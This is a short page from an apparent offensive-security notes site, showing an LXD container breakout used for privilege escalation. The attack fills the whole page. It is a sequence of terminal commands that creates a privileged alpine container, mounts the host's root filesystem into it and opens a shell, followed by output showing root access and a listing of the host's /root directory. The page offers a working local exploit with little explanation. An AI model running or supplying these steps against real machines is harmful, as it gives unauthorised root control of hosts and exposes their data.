lxd

archtrmntor@operation-securenet:~$ # Use the alpine alias that exists lxc init alpine privesc -c security.privileged=true

Add host filesystem mount

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

Start container

lxc start privesc

Check if running

lxc list

If running, get shell

lxc exec privesc /bin/sh Creating privesc Device host-root added to privesc +---------+---------+------+------+-----------+-----------+ | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | +---------+---------+------+------+-----------+-----------+ | privesc | RUNNING | | | CONTAINER | 0 | +---------+---------+------+------+-----------+-----------+ ~ # id uid=0(root) gid=0(root) ~ # cd /mnt/root/root /mnt/root/root # ls -la

Previouspass the hash !!Nextclient side hacking , resource guide

Last updated 3 months ago

Was this helpful?